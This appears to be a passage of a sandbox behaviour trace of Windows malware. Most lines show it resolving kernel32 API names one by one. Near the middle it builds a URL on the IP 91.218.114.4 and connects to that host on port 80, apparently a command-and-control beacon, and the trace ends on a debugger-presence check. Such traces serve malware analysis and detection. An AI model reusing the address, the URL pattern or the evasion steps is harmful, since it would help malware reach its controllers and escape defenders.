(lpString="DELETECRITICALSECTION") returned 21 [0048.203] lstrcpyA (in: lpString1=0x341f130, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0048.203] lstrlenA (lpString="DELETEFIBER") returned 11 [0048.203] lstrcpyA (in: lpString1=0x341f130, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0048.203] lstrlenA (lpString="DELETEFILEA") returned 11 [0048.203] lstrcpyA (in: lpString1=0x341f130, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0048.203] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0048.203] lstrcpyA (in: lpString1=0x341f130, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0048.203] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0048.203] lstrcpyA (in: lpString1=0x341f130, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0048.203] lstrlenA (lpString="DELETEFILEW") returned 11 [0048.203] lstrcpyA (in: lpString1=0x341f130, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0048.203] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0048.204] lstrcpyA (in: lpString1=0x341f130, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0048.204] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0048.204] lstrcpyA (in: lpString1=0x341f130, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0048.204] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0048.204] lstrcpyA (in: lpString1=0x341f130, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0048.204] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0048.204] lstrcpyA (in: lpString1=0x341f130, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0048.204] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0048.204] lstrcpyA (in: lpString1=0x341f130, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0048.204] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0048.204] lstrcpyA (in: lpString1=0x341f130, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0048.204] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0048.204] lstrcpyA (in: lpString1=0x341f130, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0048.204] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0048.204] lstrcpyA (in: lpString1=0x341f130, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0048.204] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0048.204] lstrcpyA (in: lpString1=0x341f130, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0048.204] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0048.204] lstrcpyA (in: lpString1=0x341f130, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0048.204] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0048.204] lstrcpyA (in: lpString1=0x341f130, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0048.204] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0048.204] lstrcpyA (in: lpString1=0x341f130, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0048.204] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0048.204] lstrcpyA (in: lpString1=0x341f130, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0048.204] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0048.204] lstrcpyA (in: lpString1=0x341f130, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0048.205] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0048.205] lstrcpyA (in: lpString1=0x341f130, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0048.205] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0048.205] lstrcpyA (in: lpString1=0x341f130, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0048.205] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0048.205] lstrcpyA (in: lpString1=0x341f130, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0048.205] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0048.205] lstrcpyA (in: lpString1=0x341f130, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0048.205] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0048.205] lstrcpyA (in: lpString1=0x341f130, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0048.205] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0048.205] lstrcpyA (in: lpString1=0x341f130, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0048.205] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0048.205] lstrcpyA (in: lpString1=0x341f130, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0048.205] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0048.205] lstrcpyA (in: lpString1=0x341f130, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0048.205] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0048.205] lstrcpyA (in: lpString1=0x341f130, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0048.205] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0048.205] lstrcpyA (in: lpString1=0x341f130, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0048.205] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0048.205] lstrcpyA (in: lpString1=0x341f130, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0048.205] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0048.205] lstrcpyA (in: lpString1=0x341f130, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0048.205] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0048.205] lstrcpyA (in: lpString1=0x341f130, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0048.206] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0048.206] lstrcpyA (in: lpString1=0x341f130, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0048.206] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0048.206] lstrcpyA (in: lpString1=0x341f130, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0048.206] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0048.206] lstrcpyA (in: lpString1=0x341f130, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0048.206] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0048.206] lstrcpyA (in: lpString1=0x341f130, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0048.206] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0048.206] lstrcpyA (in: lpString1=0x341f130, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0048.206] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0048.206] lstrcpyA (in: lpString1=0x341f130, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0048.206] wsprintfA (in: param_1=0x5b0000, param_2="http://%s%s" | out: param_1="http://91.218.114.4/create/ehphacw.jspx?g=y&wp=ay") returned 49 [0048.207] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x6e0000 [0048.207] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x6f0000 [0048.212] VirtualAlloc (lpAddress=0x0, dwSize=0x1f, flAllocationType=0x3000, flProtect=0x4) returned 0x800000 [0048.212] VirtualAlloc (lpAddress=0x0, dwSize=0x2b, flAllocationType=0x3000, flProtect=0x4) returned 0x810000 [0048.213] inet_pton (in: Family=2, pszAddrString="91.218.114.4", pAddrBuf=0x341f7d0 | out: pAddrBuf=0x341f7d0) returned 1 [0048.213] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x341fc1c | out: lpWSAData=0x341fc1c) returned 0 [0048.706] socket (af=2, type=1, protocol=6) returned 0x224 [0049.251] inet_addr (cp="91.218.114.4") returned 0x472da5b [0049.251] htons (hostshort=0x50) returned 0x5000 [0049.251] connect (s=0x224, name=0x341f7ac*(sa_family=2, sin_port=0x50, sin_addr="91.218.114.4"), namelen=16) returned 0 [0049.319] lstrlenA (lpString="kernel32.dll") returned 12 [0049.319] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0049.319] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0049.319] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0049.320] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0049.320] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0049.320] lstrlenA (lpString="ADDATOMA") returned 8 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0049.320] lstrlenA (lpString="ADDATOMW") returned 8 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0049.320] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0049.320] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0049.320] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0049.320] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0049.320] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0049.320] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0049.320] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0049.320] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0049.320] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0049.320] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0049.320] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0049.320] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0049.320] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0049.320] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0049.320] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0049.321] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0049.321] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0049.321] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0049.321] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0049.321] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0049.321] lstrlenA (lpString="BACKUPREAD") returned 10 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0049.321] lstrlenA (lpString="BACKUPSEEK") returned 10 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0049.321] lstrlenA (lpString="BACKUPWRITE") returned 11 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0049.321] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0049.321] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0049.321] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0049.321] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0049.321] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0049.321] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0049.321] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0049.321] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0049.321] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0049.321] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0049.321] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0049.322] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0049.322] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0049.322] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0049.322] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0049.322] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0049.322] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0049.322] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0049.322] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0049.322] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0049.322] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0049.322] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0049.322] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0049.322] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0049.322] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0049.322] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0049.322] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0049.322] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0049.322] lstrlenA (lpString="BEEP") returned 4 [0049.322] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0049.323] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0049.323] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0049.323] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0049.323] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0049.323] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0049.323] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0049.323] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0049.323] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0049.323] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0049.323] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0049.323] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0049.323] lstrcpyA (in: lpString1=0x341eb0c, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0049.323] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0049.323] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0049.323] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0049.323] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0049.323] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0049.323] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0049.323] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0049.323] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0049.323] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0049.323] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0049.323] lstrlenA (lpString="CANCELIO") returned 8 [0049.323] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0049.323] lstrlenA (lpString="CANCELIOEX") returned 10 [0049.323] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0049.323] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0049.323] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0049.323] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0049.323] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0049.323] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0049.323] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0049.324] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0049.324] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0049.324] lstrlenA (lpString="CHECKELEVATION") returned 14 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0049.324] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0049.324] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0049.324] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0049.324] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0049.324] lstrcpyA (in: lpString1=0x341eb0c, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") 